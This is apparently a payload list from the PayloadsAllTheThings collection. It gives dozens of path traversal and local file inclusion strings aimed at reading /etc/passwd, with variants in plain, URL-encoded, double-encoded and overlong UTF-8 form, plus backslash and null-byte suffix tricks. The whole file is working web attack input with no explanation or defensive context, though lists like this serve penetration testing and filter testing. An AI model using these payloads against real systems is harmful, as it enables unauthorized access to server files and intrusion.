# PayloadsAllTheThings LFI Traversal
# Source: https://github.com/swisskyrepo/PayloadsAllTheThings

..//etc/passwd
../..//etc/passwd
../../..//etc/passwd
../../../..//etc/passwd
../../../../..//etc/passwd
../../../../../..//etc/passwd
../../../../../../..//etc/passwd
../../../../../../../..//etc/passwd
..%2f/etc/passwd
..%2f..%2f/etc/passwd
..%2f..%2f..%2f/etc/passwd
..%2f..%2f..%2f..%2f/etc/passwd
%2e%2e//etc/passwd
%2e%2e/%2e%2e//etc/passwd
%2e%2e/%2e%2e/%2e%2e//etc/passwd
%2e%2e%2f/etc/passwd
%2e%2e%2f%2e%2e%2f/etc/passwd
..%252f/etc/passwd
..%252f..%252f/etc/passwd
%252e%252e//etc/passwd
%252e%252e%252f/etc/passwd
..\/etc/passwd
..\..\/etc/passwd
..\..\..\/etc/passwd
..%5c/etc/passwd
..%5c..%5c/etc/passwd
%2e%2e\/etc/passwd
%2e%2e%5c/etc/passwd
..%255c/etc/passwd
..%c0%af/etc/passwd
..%c0%af..%c0%af/etc/passwd
%c0%ae%c0%ae//etc/passwd
%c0%ae%c0%ae%c0%af/etc/passwd
..%25c0%25af/etc/passwd
%25c0%25ae%25c0%25ae//etc/passwd
..%c1%9c/etc/passwd
%c0%ae%c0%ae\/etc/passwd
%c0%ae%c0%ae%c1%9c/etc/passwd
..%25c1%259c/etc/passwd
%25c0%25ae%25c0%25ae\/etc/passwd
..%%32%66/etc/passwd
%%32%65%%32%65//etc/passwd
%%32%65%%32%65%%32%66/etc/passwd
..%%35%63/etc/passwd
%%32%65%%32%65%%35%63/etc/passwd
..//etc/passwd%00index.html
../..//etc/passwd%00index.html
..%2f/etc/passwd%00index.html
%2e%2e//etc/passwd%00index.html
..//etc/passwd;index.html
../..//etc/passwd;index.html
\..//etc/passwd
\../\..//etc/passwd
/..\/etc/passwd
/..\/..\/etc/passwd
